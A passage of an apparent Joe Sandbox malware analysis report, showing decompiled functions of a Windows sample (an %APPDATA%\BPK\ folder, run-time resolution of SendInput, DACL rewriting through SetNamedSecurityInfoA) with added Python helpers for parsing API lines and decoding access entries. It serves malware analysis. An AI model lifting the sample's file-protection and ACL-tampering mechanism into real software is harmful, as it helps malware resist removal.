      • Part of subcall function 0040BA17: lstrcpyA.KERNEL32(?,%APPDATA%\BPK\), ref: 0040BBD9
    • #540.MFC42(00000066,?,?,00000000,00000000), ref: 004209DC
      • Part of subcall function 00420BE7: __EH_prolog.LIBCMT ref: 00420BEC
      • Part of subcall function 00420BE7: #540.MFC42(?,?,004209F0,00000066,?,?,00000000,00000000), ref: 00420C03
      • Part of subcall function 00420BE7: #540.MFC42(?,?,004209F0,00000066,?,?,00000000,00000000), ref: 00420C12
    • #924.MFC42(?,004558C8,pk.bin,00000066,?,?,00000000,00000000), ref: 00420A52
      • Part of subcall function 0040BBE2: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040BBFB
      • Part of subcall function 0040BBE2: GetFileSize.KERNEL32(00000000,00000000), ref: 0040BC0A
      • Part of subcall function 0040BBE2: CloseHandle.KERNEL32(00000000,?,00001070,?,00000000), ref: 0040BC2F
    • #800.MFC42(?,004558C8,pk.bin,00000066,?,?,00000000,00000000), ref: 00420A6F
    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000102,?,004558C8,pk.bin,00000066,?,?,00000000,00000000), ref: 00420AAA
    • #860.MFC42(?,?,00000000,00000000), ref: 00420AC0
    • CreateDirectoryA.KERNELBASE(00000000,?,00000000,00000000), ref: 00420ACC
    • #858.MFC42(004558C8,?,004558C8,pk.bin,00000066,?,?,00000000,00000000), ref: 00420ADF
    • GetForegroundWindow.USER32(004558C8,?,004558C8,pk.bin,00000066,?,?,00000000,00000000), ref: 00420AF0
    • GetModuleHandleA.KERNEL32(user32.dll,?,00000000,00000000), ref: 00420B01
    • GetProcAddress.KERNEL32(00000000,SendInput), ref: 00420B0D
    • #924.MFC42(?,004558C8,mc.dat,?,00000000,00000000), ref: 00420B2A
    • #800.MFC42(00000000,?,004558C8,mc.dat,?,00000000,00000000), ref: 00420B47
    • lstrcpynA.KERNEL32(?,?,0000003F,00000000,?,004558C8,mc.dat,?,00000000,00000000), ref: 00420B7A
    • GetStockObject.GDI32(00000011), ref: 00420B91
    • GetObjectA.GDI32(00000000,?,00000000), ref: 00420B98
    • CreateFontIndirectA.GDI32(?), ref: 00420BA9
    • #1641.MFC42(00000000,?,00000000,00000000), ref: 00420BB3
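    The APIs list above is the part of this report that turns into indicators fastest, but it is printed for humans. The Python below is an added example (it is not part of the Joe Sandbox report and not code from the sample): it parses lines in exactly this "Name.Module(args), ref: addr" layout and recovers two things an analyst wants from them, namely which exports the sample resolves at run time through GetModuleHandleA/LoadLibraryA followed by GetProcAddress, and which literal strings (paths, file names, export names) were on the stack at each call. The sample lines embedded in it are copied from this page and marked as such. Two assumptions: the bullet and "ref:" layout is the one shown here, and pairing each GetProcAddress with the most recent loader call is a heuristic, because the report prints the module-handle argument as 00000000 or "?" rather than a value that could be matched.

```python
"""Parse Joe Sandbox 'APIs' lines and pull out what an analyst needs from them:
the exports the sample resolves at run time and the literal strings (paths,
file names) that appear as call arguments. Added example, not report code."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Layout of one APIs line as printed in the report: optional bullet, optional
# "Part of subcall function X:" prefix, Name.Module(args), ", ref: addr".
# Lines without an argument list (e.g. "__EH_prolog.LIBCMT ref: 00420977") also match.
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[^\s(.]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int
    subcall_of: Optional[int]  # address of the callee when this is a subcall line


def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # headings, blank lines, anything that is not an API record
        args = [a for a in (m.group("args") or "").split(",") if a != ""]
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             int(m.group("ref"), 16),
                             int(sub, 16) if sub else None))
    return calls


def is_literal(arg: str) -> bool:
    """The sandbox prints unknown values as '?' and known scalars as 8 hex digits;
    anything else is a string the call saw (a path, an export name, a file name)."""
    return arg != "?" and not re.fullmatch(r"[0-9A-Fa-f]{8}", arg)


LOADERS = {"LoadLibraryA", "LoadLibraryW", "GetModuleHandleA", "GetModuleHandleW"}


def resolved_imports(calls: List[ApiCall]) -> List[Tuple[str, str]]:
    """Pair each GetProcAddress with the most recent LoadLibrary/GetModuleHandle
    in call order. Heuristic: the report does not print a usable handle value,
    so call order is the only link between the two calls."""
    current_dll, out = None, []
    for c in calls:
        if c.api in LOADERS and c.args and is_literal(c.args[0]):
            current_dll = c.args[0].lower()
        elif c.api == "GetProcAddress" and len(c.args) >= 2 and is_literal(c.args[1]):
            out.append((current_dll or "<unknown>", c.args[1]))
    return out


def literal_strings(calls: List[ApiCall]) -> List[str]:
    """Every literal argument, de-duplicated and sorted. The argument columns
    include stale stack slots (this page shows 'pk.bin' under GetForegroundWindow),
    so a string here means 'was on the stack near that call', not 'was its argument'."""
    seen = set()
    for c in calls:
        seen.update(a for a in c.args if is_literal(a))
    return sorted(seen)


# Constructed sample: lines copied from this report, in the layout it prints.
SAMPLE = r"""
• GetForegroundWindow.USER32(004558C8,?,004558C8,pk.bin,00000066,?,?,00000000,00000000), ref: 00420AF0
• GetModuleHandleA.KERNEL32(user32.dll,?,00000000,00000000), ref: 00420B01
• GetProcAddress.KERNEL32(00000000,SendInput), ref: 00420B0D
• __EH_prolog.LIBCMT ref: 00420977
  • Part of subcall function 0040BA17: lstrcpyA.KERNEL32(?,%APPDATA%\BPK\), ref: 0040BBD9
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 0042AB8F
• GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoA), ref: 0042ABA4
• GetProcAddress.KERNEL32(?,SetNamedSecurityInfoA), ref: 0042ABB0
• GetProcAddress.KERNEL32(?,SetEntriesInAclA), ref: 0042ABBC
"""

if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for dll, export in resolved_imports(parsed):
        print(f"{dll}!{export}")
    print(literal_strings(parsed))
```

    Run over the lines above it reports user32.dll!SendInput and the three advapi32.dll ACL exports, plus %APPDATA%\BPK\ and pk.bin as strings; the report shows SendInput being resolved and stored at offset 0x2764 of the object, not called, so the string list is a starting point for hunting, not a statement about what each call did.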
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #540#800CreateH_prolog$#924FileHandleObjectlstrcpy$#1641#287#324#3811#6139#858#860AddressCloseDirectoryEnvironmentExpandFontForegroundIndirectModuleProcSizeStockStringsWindowlstrcpynmemsettime
    • String ID: SendInput$\aD$mc.dat$pk.bin$user32.dll
    • API String ID: 3731552281-2161017960
    • Opcode ID: 839b2a5ee156209fba177d8118557f9ad7d9a8a444482e65091b15e9791e43b7
    • Instruction ID: e4eea6b86e5ced871de749374b6528eb6292a7440d400b90dd38735084c1b76a
    • Opcode Fuzzy Hash: 839b2a5ee156209fba177d8118557f9ad7d9a8a444482e65091b15e9791e43b7
    • Instruction Fuzzy Hash: 9F619F71804B44DAC721EFB5D889ADABBF8FF19304F40482FE59E97292CB786548CB15
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph: node 25, 41a989-41a9e3, #537 * 6 (single block)
    C-Code - Quality: 42%
    			E0041A989(void* __eax) {
    
    				_push("None");
    				L0043DE26();
    				_push("User defined");
    				L0043DE26();
    				_push("Open");
    				L0043DE26();
    				_push("Print");
    				L0043DE26();
    				_push("Explore");
    				L0043DE26(); // executed
    				_push("E-mail");
    				L0043DE26();
    				return __eax;
    			}

    Instruction addresses (one per decompiled line, in listing order):
    0x0041a989 0x0041a993 0x0041a998 0x0041a9a2 0x0041a9a7 0x0041a9b1 0x0041a9b6 0x0041a9c0 0x0041a9c5 0x0041a9cf
    0x0041a9d4 0x0041a9de 0x0041a9e3

    APIs
    • #537.MFC42(None,0041A984), ref: 0041A993
    • #537.MFC42(User defined,None,0041A984), ref: 0041A9A2
    • #537.MFC42(Open,User defined,None,0041A984), ref: 0041A9B1
    • #537.MFC42(Print,Open,User defined,None,0041A984), ref: 0041A9C0
    • #537.MFC42(Explore,Print,Open,User defined,None,0041A984), ref: 0041A9CF
    • #537.MFC42(E-mail,Explore,Print,Open,User defined,None,0041A984), ref: 0041A9DE
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #537
    • String ID: E-mail$Explore$HTE$LTE$None$Open$PTE$Print$TTE$User defined$XTE$\TE
    • API String ID: 4256512136-1950943677
    • Opcode ID: 7e686be82230748a7ea72c76fc71662fd550d8772246fde61bbed9bf95af901a
    • Instruction ID: 0b179ff6aaa123cbbe3d10d2b83989e3ee134c5ba9a78a51af8896cf8ecc754c
    • Opcode Fuzzy Hash: 7e686be82230748a7ea72c76fc71662fd550d8772246fde61bbed9bf95af901a
    • Instruction Fuzzy Hash: 0DD0B204F81E809149187E55E43373D5952C7DD7CB764A15F7D011E1D38E4C4A5C552E
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 65%
    			E0042AB81(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
    				int _v8;
    				struct HINSTANCE__* _v12;
    				int _v16;
    				char _v20;
    				_Unknown_base(*)()* _v24;
    				intOrPtr _v28;
    				intOrPtr _v36;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				void _v56;
    				struct HINSTANCE__* _t36;
    				_Unknown_base(*)()* _t39;
    				signed int _t44;
    				signed int _t57;
    				void* _t58;
    				intOrPtr* _t59;
    				signed int _t61;
    				signed int _t62;
    
    				_t36 = LoadLibraryA("advapi32.dll"); // the three ACL APIs are resolved at run time rather than imported
    				_v12 = _t36;
    				_t61 = GetProcAddress(_t36, "GetNamedSecurityInfoA");
    				_t59 = GetProcAddress(_v12, "SetNamedSecurityInfoA");
    				_t39 = GetProcAddress(_v12, "SetEntriesInAclA");
    				_v24 = _t39;
    				if(_t61 == 0 || _t59 == 0 || _t39 == 0) {
    					_t62 = _t61 | 0xffffffff; // any export missing: return -1 (after FreeLibrary at L13)
    					goto L13;
    				} else {
    					_v20 = 0;
    					_v8 = 0;
    					_v16 = 0;
    					if(_a4 == 0) {
    						_t58 = 0x57; // ERROR_INVALID_PARAMETER: no object name; note this path returns without FreeLibrary
    						return _t58;
    					}
    					_t44 =  *_t61(_a4, _a8, 4, 0, 0,  &_v20, 0,  &_v16); // executed; GetNamedSecurityInfoA(name, SE_OBJECT_TYPE, DACL_SECURITY_INFORMATION, ..., &oldDacl, ..., &securityDescriptor)
    					_t62 = _t44;
    					if(_t62 == 0) {
    						memset( &_v56, 0, 0x20); // 0x20 == sizeof(EXPLICIT_ACCESS_A)
    						_v56 = _a20; // grfAccessPermissions
    						_v52 = _a24; // grfAccessMode
    						_v48 = _a28; // grfInheritance
    						_v36 = _a16; // Trustee.TrusteeForm
    						_v28 = _a12; // Trustee.ptstrName
    						_t62 = _v24(1,  &_v56, _v20,  &_v8); // SetEntriesInAclA(1 entry, &explicitAccess, oldDacl, &newDacl)
    						if(_t62 == 0) {
    							_t57 =  *_t59(_a4, _a8, 4, 0, 0, _v8, 0); // executed; SetNamedSecurityInfoA writes the merged DACL back to the named object
    							_t62 = _t57;
    						}
    					}
    					if(_v16 != 0) {
    						LocalFree(_v16); // security descriptor from GetNamedSecurityInfoA
    					}
    					if(_v8 != 0) {
    						LocalFree(_v8); // new DACL from SetEntriesInAclA
    					}
    					L13:
    					FreeLibrary(_v12);
    					return _t62;
    				}
    				}
    			}

    Instruction addresses (one per decompiled line, in listing order; 0x00000000 marks a line with no address of its own):
    0x0042ab8f 0x0042aba1 0x0042abab 0x0042abb7 0x0042abbc 0x0042abc0 0x0042abc5 0x0042ac7d 0x00000000 0x0042abdb
    0x0042abde 0x0042abe1 0x0042abe4 0x0042abe7 0x0042abeb 0x00000000 0x0042abeb 0x0042ac04 0x0042ac06 0x0042ac0a
    0x0042ac13 0x0042ac1e 0x0042ac24 0x0042ac2a 0x0042ac30 0x0042ac36 0x0042ac49 0x0042ac4d 0x0042ac5d 0x0042ac5f
    0x0042ac5f 0x0042ac4d 0x0042ac6a 0x0042ac6f 0x0042ac6f 0x0042ac74 0x0042ac79 0x0042ac79 0x0042ac80 0x0042ac83
    0x00000000 0x0042ac89

    APIs
    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0042AB8F
    • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoA), ref: 0042ABA4
    • GetProcAddress.KERNEL32(?,SetNamedSecurityInfoA), ref: 0042ABB0
    • GetProcAddress.KERNEL32(?,SetEntriesInAclA), ref: 0042ABBC
    • GetNamedSecurityInfoA.ADVAPI32(?,?,00000004,00000000,00000000,?,00000000,?), ref: 0042AC04
    • memset.MSVCRT ref: 0042AC13
    • SetEntriesInAclA.ADVAPI32(00000001,?,?,?), ref: 0042AC46
    • SetNamedSecurityInfoA.ADVAPI32(?,?,00000004,00000000,00000000,?,00000000), ref: 0042AC5D
    • LocalFree.KERNEL32(?), ref: 0042AC6F
    • LocalFree.KERNEL32(?), ref: 0042AC79
    • FreeLibrary.KERNEL32(?), ref: 0042AC83
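    In this function the sample touches object security: it resolves three advapi32 exports at run time, reads the DACL of the named object passed in _a4 (SECURITY_INFORMATION value 4), merges one EXPLICIT_ACCESS_A entry into it with SetEntriesInAclA and writes the result back with SetNamedSecurityInfoA, and both of those calls are marked as executed. Which object and which trustee it targets is not visible in the report, because those arguments print as "?". The Python below is an added example, not code from the sample or from Joe Sandbox: it packs and decodes the 32-byte EXPLICIT_ACCESS_A in the layout the function builds on its stack (field offsets are the standard 32-bit Win32 ones; the _vNN-to-field mapping follows from the five stores in the decompiled code), decodes the two literal arguments the function passes to the *NamedSecurityInfoA calls, and names the function's own return values. The pointer and mask values in the usage section are constructed for illustration, not taken from the sample.

```python
"""Codec for the EXPLICIT_ACCESS_A that E0042AB81 hands to SetEntriesInAclA,
plus symbolic decoding of its fixed arguments and return values. Added example
for reading this function or a dump of its stack frame; not code from the sample."""
import struct
from typing import Dict, List

# 32-bit EXPLICIT_ACCESS_A, sizeof == 0x20 (the size the function memsets).
# Field                            <- decompiled local <- function argument
#   0x00 grfAccessPermissions      <- _v56 <- _a20
#   0x04 grfAccessMode             <- _v52 <- _a24
#   0x08 grfInheritance            <- _v48 <- _a28
#   0x0c Trustee.pMultipleTrustee           (left zero by the memset)
#   0x10 Trustee.MultipleTrusteeOperation   (left zero)
#   0x14 Trustee.TrusteeForm       <- _v36 <- _a16
#   0x18 Trustee.TrusteeType                (left zero == TRUSTEE_IS_UNKNOWN)
#   0x1c Trustee.ptstrName         <- _v28 <- _a12
EXPLICIT_ACCESS_A = struct.Struct("<8I")

ACCESS_MODE = {1: "GRANT_ACCESS", 2: "SET_ACCESS", 3: "DENY_ACCESS",
               4: "REVOKE_ACCESS", 5: "SET_AUDIT_SUCCESS", 6: "SET_AUDIT_FAILURE"}
TRUSTEE_FORM = {0: "TRUSTEE_IS_SID", 1: "TRUSTEE_IS_NAME"}
SE_OBJECT_TYPE = {1: "SE_FILE_OBJECT", 2: "SE_SERVICE", 3: "SE_PRINTER",
                  4: "SE_REGISTRY_KEY", 5: "SE_LMSHARE", 6: "SE_KERNEL_OBJECT"}
INHERITANCE = {0x1: "OBJECT_INHERIT_ACE", 0x2: "CONTAINER_INHERIT_ACE",
               0x4: "NO_PROPAGATE_INHERIT_ACE", 0x8: "INHERIT_ONLY_ACE"}
ACCESS_MASK = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
               0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL",
               0x00100000: "SYNCHRONIZE", 0x00080000: "WRITE_OWNER",
               0x00040000: "WRITE_DAC", 0x00020000: "READ_CONTROL",
               0x00010000: "DELETE"}
SECURITY_INFORMATION = {0x1: "OWNER", 0x2: "GROUP", 0x4: "DACL", 0x8: "SACL"}


def flag_names(value: int, table: Dict[int, str]) -> List[str]:
    """Split a bit mask into known flag names; any unknown bits are kept as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(hex(rest))
    return names


def pack_explicit_access(ptstr_name: int, trustee_form: int, permissions: int,
                         access_mode: int, inheritance: int) -> bytes:
    """Build the struct exactly as the function does: zeroed, then five stores."""
    return EXPLICIT_ACCESS_A.pack(permissions, access_mode, inheritance,
                                  0, 0, trustee_form, 0, ptstr_name)


def unpack_explicit_access(buf: bytes) -> Dict[str, object]:
    """Decode 32 bytes (for instance read from the frame at ebp-0x38) into fields."""
    if len(buf) != EXPLICIT_ACCESS_A.size:
        raise ValueError(f"expected {EXPLICIT_ACCESS_A.size} bytes, got {len(buf)}")
    perm, mode, inh, _multi, _op, form, _ttype, name_ptr = EXPLICIT_ACCESS_A.unpack(buf)
    return {
        "grfAccessPermissions": flag_names(perm, ACCESS_MASK),
        "grfAccessMode": ACCESS_MODE.get(mode, hex(mode)),
        "grfInheritance": flag_names(inh, INHERITANCE) or ["NO_INHERITANCE"],
        "TrusteeForm": TRUSTEE_FORM.get(form, hex(form)),
        "ptstrName": hex(name_ptr),
    }


def describe_named_security_call(object_type: int, security_info: int) -> str:
    """Arguments 2 and 3 of both *NamedSecurityInfoA calls. The function passes
    security_info == 4 literally, so only the DACL is read and rewritten."""
    obj = SE_OBJECT_TYPE.get(object_type, hex(object_type))
    return f"{obj} {'|'.join(flag_names(security_info, SECURITY_INFORMATION))}_SECURITY_INFORMATION"


def return_code_meaning(rc: int) -> str:
    """The status values the function returns to its caller, per the listing."""
    rc &= 0xFFFFFFFF
    if rc == 0xFFFFFFFF:
        return "advapi32 export resolution failed (a GetProcAddress returned NULL)"
    if rc == 0x57:
        return "ERROR_INVALID_PARAMETER: object name (_a4) was NULL"
    if rc == 0:
        return "ERROR_SUCCESS: DACL rewritten"
    return f"Win32 error {rc} from GetNamedSecurityInfoA, SetEntriesInAclA or SetNamedSecurityInfoA"


if __name__ == "__main__":
    # Constructed values: a DENY_ACCESS entry for GENERIC_ALL, trustee given by name,
    # inheriting to files and subfolders. The pointer 0x12345678 is a placeholder.
    frame = pack_explicit_access(0x12345678, 1, 0x10000000, 3, 0x3)
    print(unpack_explicit_access(frame))
    print(describe_named_security_call(1, 4))
```

    A DENY_ACCESS entry with GENERIC_ALL is the shape to look for when a sample of this kind protects its own files; the report gives the mechanism but not the target, so the object name and trustee have to come from a debugger or a hook on SetNamedSecurityInfoA.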
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: AddressFreeProc$InfoLibraryLocalNamedSecurity$EntriesLoadmemset
    • String ID: GetNamedSecurityInfoA$SetEntriesInAclA$SetNamedSecurityInfoA$advapi32.dll
    • API String ID: 4038394612-3889278658
    • Opcode ID: 5fa07db3c90d445b6479e820bf8bebe9ed28725424803aa364c33e464a9c5e1c
    • Instruction ID: 6943dca3753150b77f1164f376aa71ff8edc357e1ae0e9c9426d76e654c563dc
    • Opcode Fuzzy Hash: 5fa07db3c90d445b6479e820bf8bebe9ed28725424803aa364c33e464a9c5e1c
    • Instruction Fuzzy Hash: C7313A75A01228BFCF11DFA9EC859DEBFB9EB48750F104122F904A3250D7748A50DFA9
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 83%
    			E00428731(void* __ecx) {
    				void* _t39;
    				void* _t41;
    				void* _t45;
    				void* _t68;
    
    				E0043E4E0(0x442f58, _t68);
    				_t45 = __ecx;
    				L0043E486();
    				 *(_t68 - 4) = 0;
    				L0043DDDE();
    				 *(_t68 - 4) = 1;
    				L0043DDD8();
    				 *(_t68 - 0x18) =  *(_t68 - 0x18) | 0xffffffff;
    				_push(0);
    				 *(_t68 - 4) = 2;
    				 *((intOrPtr*)(_t68 - 0x24)) = 0x445490;
    				 *((intOrPtr*)(_t68 - 0x1c)) = 0;
    				L0043DDD2();
    				 *(_t68 - 4) = 3;
    				L0043DDD8();
    				_t39 = _t68 - 0x24;
    				_push(_t39);
    				_push(0);
    				_push( *((intOrPtr*)(_t68 + 8)));
    				 *(_t68 - 4) = 4;
    				L0043E480(); // executed
    				if(_t39 == 0) {
    					 *(_t68 - 4) = 3;
    					L0043DD36();
    					 *((intOrPtr*)(_t68 - 0x24)) = 0x445490;
    					 *(_t68 - 4) = 6;
    					L6:
    					L0043DD36();
    					 *(_t68 - 4) =  *(_t68 - 4) | 0xffffffff;
    					 *((intOrPtr*)(_t68 - 0x24)) = 0x44547c;
    					L0043E46E();
    					 *[fs:0x0] =  *((intOrPtr*)(_t68 - 0xc));
    					return 0;
    				} else {
    					goto L1;
    				}
    				while(1) {
    					L1:
    					_t41 = _t68 - 0x10;
    					_push(_t41);
    					L0043E4B6();
    					if(_t41 == 0) {
    						break;
    					}
    					_t42 =  *((intOrPtr*)(_t68 - 0x10));
    					if( *((intOrPtr*)( *((intOrPtr*)(_t68 - 0x10)) - 8)) != 0) {
    						E00428515(_t45, _t42);
    					}
    				}
    				L0043E474();
    				 *(_t68 - 4) = 3;
    				L0043DD36();
    				 *((intOrPtr*)(_t68 - 0x24)) = 0x445490;
    				_push(1);
    				 *(_t68 - 4) = 5;
    				_pop(0);
    				goto L6;
    			}

    Instruction addresses (one per decompiled line, in listing order; 0x00000000 marks a line with no address of its own):
    0x00428736 0x0042873f 0x00428746 0x00428750 0x00428753 0x0042875b 0x0042875f 0x00428764 0x0042876d 0x00428771
    0x00428775 0x00428778 0x0042877b 0x00428783 0x00428787 0x0042878c 0x00428792 0x00428793 0x00428794 0x00428797
    0x0042879b 0x004287a2 0x004287e9 0x004287ed 0x004287f2 0x004287f5 0x004287f9 0x004287fc 0x00428801 0x00428808
    0x0042880f 0x0042881c 0x00428824 0x00000000 0x00000000 0x00000000 0x004287a4 0x004287a4 0x004287a4 0x004287aa
    0x004287ab 0x004287b2 0x00000000 0x00000000 0x004287b4 0x004287ba 0x004287bf 0x004287bf 0x004287ba 0x004287c9
    0x004287d1 0x004287d5 0x004287da 0x004287dd 0x004287df 0x004287e3 0x00000000

    APIs
    • __EH_prolog.LIBCMT ref: 00428736
    • #533.MFC42(?,004558C8,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00428746
    • #350.MFC42(?,004558C8,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00428753
    • #540.MFC42(?,004558C8,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0042875F
    • #860.MFC42(00000000,?,004558C8,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0042877B
    • #540.MFC42(00000000,?,004558C8,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00428787
    • #5194.MFC42(?,00000000,?,00000000,?,004558C8,00000000), ref: 0042879B
    • #5465.MFC42(?,?,00000000,?,00000000,?,004558C8,00000000), ref: 004287AB
    • #1997.MFC42(?,?,00000000,?,00000000,?,004558C8,00000000), ref: 004287C9
    • #800.MFC42(?,?,00000000,?,00000000,?,004558C8,00000000), ref: 004287D5
    • #800.MFC42(?,00000000,?,00000000,?,004558C8,00000000), ref: 004287ED
    • #800.MFC42(?,00000000,?,00000000,?,004558C8,00000000), ref: 004287FC
    • #798.MFC42(?,00000000,?,00000000,?,004558C8,00000000), ref: 0042880F
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
